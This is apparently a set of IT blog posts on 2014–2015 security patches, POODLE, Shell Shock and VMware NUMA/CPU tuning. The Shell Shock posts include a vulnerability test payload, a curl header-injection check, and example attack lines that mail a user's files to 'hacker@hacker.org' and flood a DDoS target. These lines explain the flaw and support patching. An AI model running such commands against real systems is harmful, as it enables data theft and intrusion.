Best Practices to Combat Computer Security Issues in 2015

Cisco’s recently published 2015 Annual Security Report summarized the security trends it found in 2014 and advised on best practices to address predicted threats in 2015.  Some of the key security findings were:

  • Malware is getting better at evading detection
    With increasing attention to Java security, the number of exploits using Java decreased over the course of 2014. However, exploits are becoming more difficult to detect because they change quickly, they are expanding into technologies not often exploited before (e.g. Microsoft’s Silverlight), and they can involve multiple technologies (e.g. using both Flash Player and JavaScript).

  • Spam is growing in volume and sophistication
    Cisco found that the volume of spam increased 250% from January to November 2014, and spammers are finding more ways of evading spam filters. Spam content, sender addresses, and originating IP addresses can all be difficult to differentiate from legitimate emails. To hide the sender’s IP address, spammers have been using a “snowshoe” method of emailing in which the messages are sent from a large number of (often infected) computers, so it isn’t possible to trace the email back to a specific blacklisted address.

  • Known threats are still problems on outdated software
    2014’s headline security threats – Heartbleed and Shellshock – are still issues. Cisco’s surveys found that 56% of OpenSSL implementations were running versions more than 4 years old, and only 10% of the IE browsers accessing sites were using the current version. The problem is not that patches aren’t being applied; it’s that installations aren’t being updated to versions for which patches are available. Cisco provided the following recommendation:

    To overcome the guaranteed eventual compromise that results from manual update processes, it may be time for organizations to accept the occasional failure and incompatibility that automatic updates represent.

  • Users are a significant vulnerability
    Malware may be inadvertently downloaded from seemingly safe websites – Cisco found that many high-ranking, short-lived websites contained malware. Malware was also installed through browser add-ons and software downloads, often with misleading and confusing install options that trick the user into agreeing to install the malware. In Cisco’s survey of 70 companies, 711 users were affected by malware at the beginning of the year, rising to a peak of 1,751 affected users in September.

Cisco provided several recommendations on how to deal with the current security climate:

  • Adopt a more sophisticated endpoint visibility, access, and security (EVAS) control strategy.
    Even if you are able to secure your network, you still have to plan for what to do if an attack occurs. Determining the scope of an attack that makes it past a network’s front door means monitoring the potential target endpoints within the network. EVAS monitors endpoint activity within a network before, during, and after attacks, allowing you to formulate a plan to mitigate the threat and providing the tools to conduct a forensic analysis to prevent the problem from recurring.

  • Security must be integrated into the business
    Business planners and security staff must work together to ensure that security is an integral part of all IT plans. However, security that makes it difficult for users to access resources can result in users finding ways to circumvent those measures. Security planning must consider both protection from threats and accessibility for users.

  • Users must be included in the security plans
    No security plan will be able to address every problem; there are too many possible threats and they change too quickly. Users must be trained on which activities are potentially dangerous, how to recognize when there is a problem, and how to report it.

VMware NUMA Performance

In our previous post we outlined how NUMA works with Virtual Machines (VMs) that either fit entirely into one NUMA home node or are divided into multiple NUMA clients, each assigned its own home node. The following points should be considered when working with VMs that use NUMA hardware:

  • The hypervisor may migrate VMs to a new NUMA node on the host.
    Hypervisors adjust physical resources as needed to balance VM performance and fairness of resource allocation across all VMs. If the home NUMA node for a VM is maxed out on CPU, the hypervisor may allocate CPU from a different NUMA node, even if that means incurring latency from accessing remote memory. When CPU becomes available on the NUMA node holding the VM’s memory, the hypervisor will migrate the CPU resources back to that node to improve memory access. The hypervisor factors in CPU usage, memory locality, and the performance cost of moving memory from one NUMA node to another when deciding whether to migrate a VM to a different NUMA node.


    VMs may also be migrated in an attempt to achieve long-term fairness. The CPU Scheduler in VMware vSphere 5.1 gives an example of 3 VMs on 2 NUMA nodes: the node with 2 VMs splits its resources between them, while the node with one VM allocates all of its resources to that VM. In the long term, migrating VMs between the two nodes may average out performance, but in the short term it just transfers the resource contention from one VM to another, with the additional performance cost of moving memory between nodes. This type of migration can be disabled by setting the advanced host attribute /Numa/LTermFairnessInterval=0 (see the example commands at the end of this post).

  • VMs that frequently communicate with each other may be placed on the same NUMA node.
    VMware’s ESX hypervisor may place VMs together on the same NUMA node if there is frequent communication between the VMs. This “action-affinity” can end up causing an imbalance in VM placement by assigning multiple VMs to the same home NUMA node and underpopulating other NUMA nodes. In theory, the gain from the VMs being able to access common memory resources will offset the increase in CPU ready levels. In practice this may not be the case, and the feature can be disabled by setting /Numa/LocalityWeightActionAffinity=0 in the advanced host attributes.

  • Hyperthreading doesn’t count when VMs are assigned to NUMA nodes.
    The hypervisor looks at available physical cores when determining which NUMA node to assign as the home node for a VM. If a NUMA node has 4 physical cores and a VM is allocated 8 processors, the VM will be divided into 2 NUMA clients spread over 2 nodes. This ensures CPU resources but may increase memory latency. If a VM is running a memory-intensive workload, it may be more efficient to restrict the VM to one NUMA node by configuring the hypervisor to take hyperthreading into account. This is done by setting the numa.vcpu.preferHT advanced VM property to True.

  • VMs migrating between hosts with different NUMA configurations may experience degraded performance.
    For VMs moving to a host with smaller NUMA nodes, it is possible that they will need to be split into multiple NUMA clients, while hosts with larger NUMA nodes may be able to merge wide VMs into a single node. Performance will be degraded until the hypervisor on the new host can configure the VMs for the new host NUMA configuration.

  • VMs spread over multiple NUMA nodes may benefit from vNUMA.
    Some applications and operating systems can take advantage of the NUMA architecture to improve performance. A VM running these applications or operating systems that is spread across multiple NUMA nodes can be configured to use virtualized NUMA (vNUMA) to take advantage of the underlying architecture just as if it were on a physical host, which can lead to large performance gains. However, if the VM migrates to a host with a different NUMA configuration, performance may degrade until the VM can be restarted with a vNUMA layout that matches the new host.

While adjustments to the hypervisor’s NUMA algorithms may provide some performance improvements, the last two items are the most important takeaways. It is a best practice to ensure that hosts in a cluster have the same NUMA configuration to avoid performance issues when VMs move from one host to another.
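For reference, the advanced settings mentioned in the list above can be changed roughly as follows. This is a sketch only; confirm the option names and syntax against the documentation for your specific ESXi version, and note that the host-level commands assume shell access to the ESXi host.

    # Host-level NUMA scheduler attributes (run from the ESXi shell):
    esxcli system settings advanced set -o /Numa/LTermFairnessInterval -i 0        # disable long-term fairness migrations
    esxcli system settings advanced set -o /Numa/LocalityWeightActionAffinity -i 0 # disable action-affinity placement

    # Per-VM setting (add to the VM's .vmx file while the VM is powered off,
    # or set it as an advanced configuration parameter in the vSphere client):
    # numa.vcpu.preferHT = "TRUE"

The same host attributes can also be edited through the vSphere client under the host’s advanced settings, which is the safer route if you are not comfortable on the command line.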

How to Minimize CPU Latency in VMware with NUMA

On the most basic level, CPUs do one thing: process data based on instructions. The faster the CPU, the faster it processes data. But before a CPU can process data, it has to read both the data and the instructions from slower system RAM, and that latency can stall processing. To minimize the time the CPU spends waiting on reads, CPU architectures include on-chip memory caches that are much faster than RAM. However, even though on-chip caches have hit rates better than 95%, there are still times when the CPU has to wait for data from RAM.

When the CPU reads from RAM, the data is transferred along a bus shared by all the CPUs in a system. As the number of CPUs in a system increases, the traffic along that bus increases as well, and CPUs can end up contending with each other for access to RAM. This is where NUMA comes in: NUMA is designed to minimize system bus contention by increasing the number of paths between CPU and RAM.

NUMA (Non-Uniform Memory Access) breaks up a system into nodes of associated CPUs and local RAM. NUMA nodes are optimized so that the CPUs in a node preferentially use the local RAM within that node. The result is that CPUs typically contend only with the other CPUs in their NUMA node for access to RAM rather than with all the CPUs in the system.

As an example, consider a system with 4 processor sockets (4 cores each) and 128 GB RAM. Without NUMA, that comes to 16 physical processors that could potentially be queued up on the same system bus to access the full 128 GB of RAM. If this same system were broken up into 4 NUMA nodes, each node would have 4 CPUs with local access to 32 GB of RAM.
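As a quick sanity check of that arithmetic (a trivial shell sketch, not tied to any particular tool):

    # NUMA breakdown for the example system: 4 sockets x 4 cores, 128 GB RAM total
    sockets=4; cores_per_socket=4; total_ram_gb=128
    nodes=$sockets                                   # one NUMA node per socket in this example
    echo "CPUs per node:      $cores_per_socket"
    echo "Local RAM per node: $(( total_ram_gb / nodes )) GB"   # 128 / 4 = 32 GB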

The ESXi hypervisor can manage virtual machines (VMs) so that they take advantage of the NUMA system architecture. The VMware 5.1 Best Practices Guide divides VMs running on NUMA into 2 groups:

  1. The number of virtual CPUs for a VM is less than or equal to the number of physical CPUs in the NUMA node.
    The ESXi hypervisor assigns the VM to a home NUMA node where memory and physical CPU are preferentially used. The best practice in this case is to keep the allocated VM memory smaller than the NUMA node’s memory. As far as the VM is concerned, it is effectively on a non-NUMA system where all CPU and memory resources are local.

  2. The number of virtual CPUs for a VM is greater than the number of physical CPUs in the NUMA node (“Wide VMs”).
    Wide VMs are split into multiple NUMA clients, with each client assigned a different home NUMA node. For example, if a system had NUMA nodes of 1 socket with 4 cores each (4 physical CPUs per node) and a wide VM had 8 virtual CPUs, ESXi could divide the VM into two NUMA clients of 4 virtual CPUs each, assigned to 2 different home NUMA nodes. The problem with dividing a wide VM into multiple NUMA clients is that one client may end up needing to access memory that is local to a different client’s node, which is slower than local access.
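One way to see whether a wide VM is actually paying that remote-memory penalty is the NUMA statistics view in esxtop (a hedged pointer; the exact field names can vary slightly between ESXi versions):

    # From the ESXi shell: start esxtop, press 'm' for the memory view, then 'f' to
    # toggle fields and enable the NUMA statistics. The N%L column shows the percentage
    # of each VM's memory that is local to its home node(s); values well below 100%
    # indicate that one of the VM's NUMA clients is accessing remote memory.
    esxtop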

Note: In a previous post we discussed hyperthreading. As per The CPU Scheduler in VMware vSphere 5.1, hyperthreading isn’t taken into account when calculating the number of processors available on a NUMA node.

In our next post we’ll take a look at using virtual NUMA (vNUMA) to minimize wide VMs accessing remote NUMA memory and what happens when VMs configured to use NUMA are migrated to a host with a different NUMA system configuration.

Just When You Thought Your Devices Were Secure…

Last month’s Shell Shock bug had Unix, Linux and network admins patching their systems against a bash shell vulnerability. This month everyone gets to play along, as October adds patches for Microsoft, Adobe, Oracle and a new SSL bug named POODLE.

  • Microsoft October 2014 patches
    Microsoft has issued 3 Critical and 5 Important patches. One of the Critical patches addresses 14 vulnerabilities in Internet Explorer versions 6 through 11, although the bugs are rated only Moderate in IE 6. As discussed in a previous post, Microsoft can’t test every possible configuration, so I suggest installing patches on test systems in your own environment before deploying them throughout your Windows environment.

  • Adobe Flash Player patches
    Adobe has issued patches for both ColdFusion (Important) and Flash Player (Critical). The Critical Flash Player patches cover Windows, Mac, Linux, Android and iOS and include patches for both Flash Player and Adobe AIR. Adobe also recommends upgrading to the latest versions in addition to patching, and you’re better off patching and upgrading Flash sooner rather than later. You may also want to consider using a Flash Block/Flash Control plugin or configuring IE to require your approval before sites can run Flash Player content.

  • Oracle Critical Patch Update
    The National Vulnerability Database lists 131 CVE vulnerabilities for Oracle in October 2014. Oracle’s patches also cover its Java, Solaris and MySQL acquisitions, and the patches for Java SE on Windows rate up to 10 out of 10 in severity. The Oracle update page provides an extensive risk matrix for each of the patched applications; use it to evaluate the severity of the vulnerabilities for your specific applications, then test and patch accordingly.

  • POODLE bug in SSL3.0
    POODLE stands for Padding Oracle On Downgraded Legacy Encryption (CVE-2014-3566) and works by listening in on and decrypting less secure SSL 3.0 traffic. Most web servers and clients use the secure TLS protocols for HTTPS connections and fall back to SSL 3.0 only for legacy applications. However, it is possible for attackers to interfere with an HTTPS session negotiation so that TLS fails and the session falls back to SSL 3.0, allowing the bug to be exploited. The fix for POODLE is to remove the SSL 3.0 protocol from web servers and clients, or to disable fallback to SSL 3.0 if you need to maintain legacy applications. This vulnerability should be addressed for both web servers and web clients as soon as possible, but it is rated 4.3 (Medium) and is nowhere near the threat level of either Shell Shock or Heartbleed.

    Microsoft provides instructions on a registry edit to disable SSL 3.0 for IIS web servers and askubuntu.com has information on how to remove SSL 3.0 support for Apache, Nginx and other web servers. Qualys SSL Labs provides an SSL Server test that will evaluate the security of your site for SSL 3.0 and other potential vulnerabilities.
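    As a rough illustration of those server-side changes (verify the registry path and directive names against the Microsoft advisory and your distribution’s documentation before applying them, restart the affected services afterwards, and note that www.example.com stands in for the server you are testing):

    # Test whether a server still accepts SSL 3.0 (requires an openssl build that retains -ssl3 support):
    openssl s_client -connect www.example.com:443 -ssl3 < /dev/null
    # A completed handshake means SSL 3.0 is still enabled; a handshake failure is what you want to see.

    # Apache: allow everything except SSLv2/SSLv3 in the SSL configuration:
    #   SSLProtocol all -SSLv2 -SSLv3
    # Nginx: list only the TLS protocols you want to accept:
    #   ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

    # IIS (per Microsoft's registry guidance; run from an elevated prompt and reboot afterwards):
    #   reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server" /v Enabled /t REG_DWORD /d 0 /f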

    Qualys also provides a browser test for SSL 3.0 support. Eventually, newer browsers will stop supporting SSL 3.0, but until then it can be disabled:

    • Firefox
      Set “security.tls.version.min” to 1 in “about:config” – or use the Disable SSL 3.0 plugin to do it for you.

    • Google Chrome
      You can use the startup flag “--ssl-version-min=tls1” to start Chrome without SSL 3.0 support. Recent versions of Chrome also support the TLS_FALLBACK_SCSV mechanism that prevents failing back to SSL 3.0.

    • Internet Explorer
      In Tools – Internet Options – Advanced – Security, uncheck the boxes for SSL 2.0 and SSL 3.0.

Maximizing VM Performance and CPU Utilization

In a previous post we discussed memory management in VMware and the allocation of memory. Memory over allocation is when you provision your virtual machines with more memory than actually exists on the host machine. Memory over allocation works because the hypervisor assigns memory to virtual machines as needed rather than as provisioned. Do you have a server that needs 2 GB of memory for 10 minutes each night and runs at 0.5 GB for the rest of the day? The hypervisor will run the VM with 0.5 GB of memory, increase it to 2 GB as needed for those 10 minutes, and then reclaim the memory once it hasn’t been used for a while and is needed elsewhere.

The safest scenario is to plan for the case where all VMs are using their maximum memory allocation and to assign only existing resources. However, this leaves a lot of idle memory on the table that could be used for additional VMs. If you use that idle memory to provision additional VMs, the (unlikely) worst case would be all the VMs spiking to 100% memory use at the same time, causing the hypervisor to start swapping and leading to severe performance degradation. The additional VMs you could create from memory over allocation aren’t worth the risk for a mission-critical VM; however, if you need to squeeze in a couple more web servers or virtual desktops, memory over allocation is useful.

Just as with VM memory, CPU is usually highly underutilized and can be over allocated without compromising performance. As per the Performance Best Practices for VMware vSphere 5.5:

In most environments ESXi allows significant levels of CPU overcommitment (that is, running more vCPUs on a host than the total number of physical processor cores in that host) without impacting virtual machine performance.
(p. 20)

Without over allocation, the total number of vCPUs is limited to the number of physical CPU cores (pCPU) on a host:

(# Processor Sockets) X (# Cores / Processor)  = # Physical Processors (pCPU)

If the physical processors use hyperthreading:

(# pCPU) X (2 logical processors / physical processor) = # Logical Processors

If you’ve got 2 processors with 6 cores each, that provides 12 pCPUs, or 24 logical processors with hyperthreading enabled. However, hyperthreading works by providing a second execution thread to an existing core: when one thread is idle or waiting, the other thread can execute instructions. This can increase efficiency if there is enough CPU idle time to schedule two threads, but in practice the performance increase is up to about 30% rather than the 2x suggested by the logical CPU count.
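A quick worked example of those formulas for that 2-socket, 6-core host (plain shell arithmetic; the 30% figure is the rough hyperthreading gain mentioned above, not a measured value):

    sockets=2; cores_per_socket=6; ht_gain_pct=30
    pcpu=$(( sockets * cores_per_socket ))             # 12 physical processors
    logical=$(( pcpu * 2 ))                            # 24 logical processors with hyperthreading
    effective=$(( pcpu * (100 + ht_gain_pct) / 100 ))  # ~15 core-equivalents of realistic capacity
    echo "pCPU=$pcpu  logical=$logical  realistic capacity ~ $effective cores"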

In addition to the effect of hyperthreading, you will also need to consider the type of workloads being run and whether you are using NUMA (Non-Uniform Memory Access) hardware. We’ll delve into the intricacies of tuning vCPUs, workloads, and host hardware in a later post. For now, Best Practices for Oversubscription of CPU, Memory and Storage suggests starting with one vCPU per VM and increasing as needed, and it quotes recommendations for the maximum vCPU-to-pCPU ratio ranging from 1.5 to 15.

The Best Practices paper lists several metrics to monitor in order to determine the best vCPU to pCPU ratio for your environment:

VM CPU Utilization: To determine if a VM requires additional vCPU resources.
Host CPU Utilization: To determine overall pCPU utilization.
CPU Ready: Measures the amount of time a VM has to wait for pCPU resources. VMware recommends this should be less than 5%.

Maximum CPU utilization for both host and VM is typically set at 80%, but this value should be adjusted depending on your workload and hardware.
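If you want to sample those counters from the ESXi command line rather than from the vSphere performance charts, batch-mode esxtop is one option (a hedged example; adjust the sample count and interval to suit your environment):

    # 10 samples, 5 seconds apart, written as CSV for later analysis
    esxtop -b -n 10 -d 5 > cpu-samples.csv
    # In the output, watch the %RDY column (CPU Ready) per VM; sustained values above
    # roughly 5% per vCPU suggest the vCPU-to-pCPU ratio is too aggressive for the workload.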

Shell Shock Patch Update

Five additional bash bugs have been discovered since our post about the CVE-2014-6271 Shell Shock bug last week: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187. Vendors have been issuing patches as the vulnerabilities were announced, and early versions of Shell Shock patches will not cover all of them. ZDNet has a good write-up of tests that can be used to determine which vulnerabilities have been patched and which are still open to attack.

As previously mentioned, operating systems and network devices that use bash will need to be patched:

  • Apple: The Register has an update with links to Apple patches.
  • Cisco: A frequently updated Cisco Security Advisory breaks down supported Cisco products into “Under Investigation”, “Vulnerable”, and “Confirmed Not Vulnerable”, and provides instructions on how to patch vulnerable products or how to purchase upgrades if you don’t have Cisco support.
  • F5: F5 provides a list of vulnerability assessments by product and version.
  • Oracle: Oracle’s security advisory uses the same Vulnerable/Not Vulnerable/Under Investigation breakdown as Cisco and provides links to available patches. You will need an Oracle account to get the patches.
  • VMware: VMware’s Knowledge Base article 2090740 states that while ESX 4.0 and 4.1 are no longer supported they are potentially vulnerable and VMware will provide patches. The complete list of patches is available at VMSA-2014-0010 and includes patches for VMware virtual appliances. ESXi is not vulnerable as it uses the ash shell instead of bash.

Check with your vendor if they are not in the above list and check for updates frequently.

Are You Vulnerable to the Shell Shock Bug?

I’ve written a few posts where I’ve advocated moving from XP to Linux and stated that one of the benefits of Linux is that it is relatively malware- and virus-free. Not completely secure, but relatively so. One avenue of attack on Linux and other Unix variants is that they include some basic core utilities written before internet security was a significant consideration, and exploits are now being found in that comparatively ancient foundation.

Case in point: CVE-2014-6271, dubbed the Shell Shock bug. As per the explanation from seclists.org, the problem is that the bash shell in Unix/Linux allows you to define a variable as a function, but bash continues to process the code past the end of the function definition. The following command contains an example of the flaw and can be used to determine whether you’re vulnerable:

env X='() { :;}; echo you are vulnerable' bash -c 'echo this was a test'

If you run this command and see “you are vulnerable” and “this was a test”, then the flaw can be exploited on your system. If all you see is “this was a test”, then you’re OK. The problem part of the command above is the “echo you are vulnerable” section, because it can be replaced with any command. In most cases the Shell Shock bug won’t run with root permissions, so it won’t be able to delete system files. However, even a minimally privileged user account can mail all of a user’s files to a hacker (cd; cat * | mail -s "all my files" hacker@hacker.org), set a computer up as a node in a DDoS attack (ping -c 9999999 ddos.target.com), or fill in your own computer security worst-nightmare scenario.

Another factor is that Linux and Unix computers aren’t the only vulnerable systems. The bash shell is used on network devices, is embedded in the “internet of everything”, and is the default shell on Apple’s OS X. The problem isn’t that the flaw is difficult to patch; the problem is that it is difficult to patch every bash shell that has the vulnerability. Given the patch issues Apple has had recently, they need to do their best to impress upon their users that the Shell Shock patch is a critical security update.

Is this as serious a threat as Heartbleed was? Yes. In fact, it may be worse because it’s easier to exploit. Heartbleed depended on finding confidential information in a random memory dump; Shell Shock can be exploited through HTTP headers passed to CGI scripts and depends mostly on finding a vulnerable device. Hackers had already created worms to find devices and exploit Shell Shock less than a day after the vulnerability was announced.
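For example, a common way to check your own CGI-enabled web server is to send the crafted function definition in an HTTP header. This is a sketch only: the URL and script name are placeholders for a CGI script you control, and it should never be pointed at systems you don’t own.

    # Send the Shell Shock payload in the User-Agent header to one of your own CGI scripts
    curl -A '() { :;}; echo Content-Type: text/plain; echo; /usr/bin/id' http://localhost/cgi-bin/test.cgi
    # If the response contains the output of the id command, the web server is passing the
    # header to a vulnerable bash and needs to be patched (or the CGI script disabled) immediately.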

In the last post I discussed how it’s a good idea to wait before applying some patches. For OS patches like the quickly pulled iOS 8.0.1, you’re better off waiting; security patches, on the other hand, should be applied as soon as possible. With a vulnerability like Shell Shock you need to check all your systems, patch them as soon as patches are available, and enact a mitigation plan until everything is patched.

Unfortunately, final patches may take a while, and bash updates issued as of 9/25 may not completely fix the problem. We will likely see multiple rounds of patches before this is fully addressed.


10/1/14 Update: See Shell Shock Patch Update for information on additional bash bugs and links to vendor patches.

Should Automatic Updates Be Enabled On Your Computer?

In the best of all possible worlds, every software update would work perfectly and there would be no question about whether you should enable automatic updates. However, updates can and have caused significant problems, ranging from annoying errors to blue-screen crashes, which raises the question of whether automatic updates should be used at all.

When complaining about patch problems, Microsoft is an easy and obvious target. It issues patches on a known schedule and has an install base diverse enough that it’s impossible to test every patch with every software permutation. Software incompatibilities are inevitable and problems are widely publicized, but Microsoft eventually sorts out the problems and withdraws or reissues patches. For Microsoft patches it is usually best to wait a few days and check for problems in the field before installing.

Patching third-party software is just as critical as patching your operating system, and those patches can have problems as well. As reported by The Register, an update to Symantec’s Norton Internet Security (NIS) delivered via Live Update just before Labor Day weekend caused browsers to crash, mainly on systems running XP. Since Microsoft no longer provides patches for XP, third-party security products (such as NIS) may be the primary line of defense for XP users, and the interim advice quoted on Symantec forums of upgrading to Windows 7 or turning off browser protection was not particularly helpful. Eventually a fix was disseminated through Live Update, and the problem was purported to have been caused by older hardware rather than XP itself.

One of the significant differences between Microsoft OS patches and third-party software patches is that a problem with an OS patch is more likely to cause a system crash, while a third-party patch is more likely to cause an issue in the program being patched. Security software updates such as virus definitions may need to be disseminated quickly, and even with the possibility of problems you’re better off with the updated definitions.

This prompts the question: what should be automatically updated? By default, most third-party software is configured to update automatically. Should you go through each of your programs and reconfigure them to install only patches that you have approved?

The answer is that it depends:

  • Do you have alternate software with the same functionality?
    If you have Chrome, IE, Firefox and Opera, and a bad patch takes out one of them, the others are still available to search for and download fixes.

  • Is your operating system configured in some way that may not have been tested when the patch was created?
    Are you running relatively old hardware? Do you have an English-language OS with Asian and/or Cyrillic fonts installed? Have you tweaked the settings in your antivirus program? Make sure you’ve backed up your system before applying any patches and that you know how to restore it. As we discussed in a previous post, not every software permutation can be tested, and incompatibilities can cause blue screens.

  • Is your OS officially supported for the software?
    Programs written for XP may work on newer Windows versions, but OS updates could break dependencies in legacy software. Keep track of OS updates and check the functionality of legacy software to determine whether a patch needs to be rolled back to keep the software working.

  • Is the software frequently patched? Are critical vulnerabilities being patched?
    Adobe Reader and Adobe Flash Player are both patched frequently, often for critical vulnerabilities. The Java Runtime Environment (JRE) is also a frequent target for exploits on your computer. Adobe products and the JRE should be configured for automatic updates, as should virus definitions.

Keep in mind that the possibility of a patch causing a problem is relatively small, and even a fully patched system will never be completely safe. There will always be a gap between when newly discovered vulnerabilities start to be exploited and when patches become available for them. The only way to address that gap is by training your users on what they should not be doing on the internet.

512k Day Isn’t the Cloud’s Only Network Problem

August 12th was 512k day: the day the number of IPv4 BGP routing table entries reached 512k routes. This matters because some routers have a default limit of 512k IPv4 routes, and if they haven’t been modified to increase that limit they can crash or fail to load new routes. There are fixes for this problem and not all routers are affected, but even with advance notice there were still outages and slowdowns when the number of routes passed 512k.

The thing to note about this outage isn’t just that known problems were not addressed; it’s that even if your network were configured perfectly and a remote resource vendor were delivering its promised 99.999% uptime, there could still be a service outage from your perspective if there was a problem in the network between you and your provider. This is especially important when considering moving your resources to the cloud. While a cloud-based EMR system may provide tremendous benefits at a cost-effective rate, a doctor can’t do their job if a problem with the hospital’s internet connection keeps them from getting test results or medical history.

The 512k limit wasn’t the first network disruption and it will not be the last. As soon as a clever way is developed to manage the internet, an even more clever way will be found to hack it. Basic infrastructure equipment that has been working for years without any issues can become a victim of specifications that are now obsolete. In short, there is no way to guarantee uptime for anything accessed over the internet. Accepting the possibility of downtime is the price you pay for the economies of Cloud computing.

If you can accept the possibility of downtime and Cloud computing is a fit for your company, one main criterion in selecting a Cloud provider should be its availability as seen from your site. Test to verify that you can consistently access the provider with minimal latency during your trial period, and archive the data to create your own availability SLA reports for each prospective vendor. Collect data on network bandwidth for each provider as well, and extrapolate the data from your test environment up to the estimated usage of a full deployment.
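One low-tech way to collect that availability and latency data during a trial is a simple probe script run from your own network. A sketch with placeholder values follows: provider.example.com stands in for the vendor endpoint you are evaluating, and the five-minute interval is arbitrary.

    #!/bin/sh
    # Append a timestamp and the total request time for the provider endpoint every 5 minutes.
    while true; do
      printf '%s,' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" >> provider-latency.csv
      curl -s -o /dev/null -w '%{time_total}\n' https://provider.example.com/ >> provider-latency.csv
      sleep 300
    done

Archived over a few weeks, a log like this gives you your own availability and latency baseline to compare against each vendor’s SLA claims.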

To look at a provider’s performance over a longer term, services such as downdetector.com aggregate user reports of downtime and can provide an archive of previous issues. Downtime from the perspective of previous clients can also provide insight into how a Cloud vendor handles support issues after you’ve implemented their software. Detailed post-mortems of issues are welcome but not the norm; however, support through Twitter and updates via Facebook are common and provide a history of previous issues.

Should network outages mean you have to rule out Cloud computing? The possibility of outages is definitely a factor to consider, but how significant those outages are to you will depend on your network, the Cloud provider, and how sensitive you are to losing services.

Windows Patch Problems

The Windows August Update released on 8/12/14 included 4 updates for Windows 7, 8 and 8.1 that were linked to blue screens. Since the release, all 4 patches have been pulled by Microsoft, but if you have Automatic Updates configured on your computer and the patches were applied, Microsoft has provided manual instructions on removing them (see the section on Mitigations). Please note that the removal instructions are carried out in safe mode; if your computer won’t boot to safe mode, you may need to resort to whatever recovery utilities came with your PC.

If you have Automatic Updates configured to download patches and ask before installing, check the list of recommended patches and make sure the following patches are not selected for installation:

  • 2982791  MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
  • 2970228  Update to support the new currency symbol for the Russian ruble in Windows
  • 2975719  August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
  • 2975331  August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012
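If one of these has already been installed and your system still boots normally, an update can also be removed by KB number from an elevated command prompt; Microsoft’s safe-mode instructions remain the authoritative removal path. A hedged example using the first KB number above:

    rem Remove an installed update by KB number (run as administrator; Windows will prompt before restarting)
    wusa /uninstall /kb:2982791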

This isn’t the first time patches have been released and then pulled back or needed to be patched themselves:

This is by no means a complete list of past patch problems, but it illustrates that patches intended to make a system perform better and run more securely can have unintended consequences. The problem is not that the patches haven’t been tested before release, but rather that there is no way to test every possible system permutation. For example, the April 2013 issue was caused by third-party Brazilian banking security software, and the most recent patch problem occurs if “OpenType Font files are installed in non-standard font directories that are recorded in the registry with fully qualified filenames”.

Does the chance of a crash mean you should disable updates? Of course not; that would leave your computer vulnerable to security problems. It does mean that you should disable automatic installation and require updates to be approved before they are installed. In addition, check for reports of issues with updates before installing them, and only apply patches intended for your system.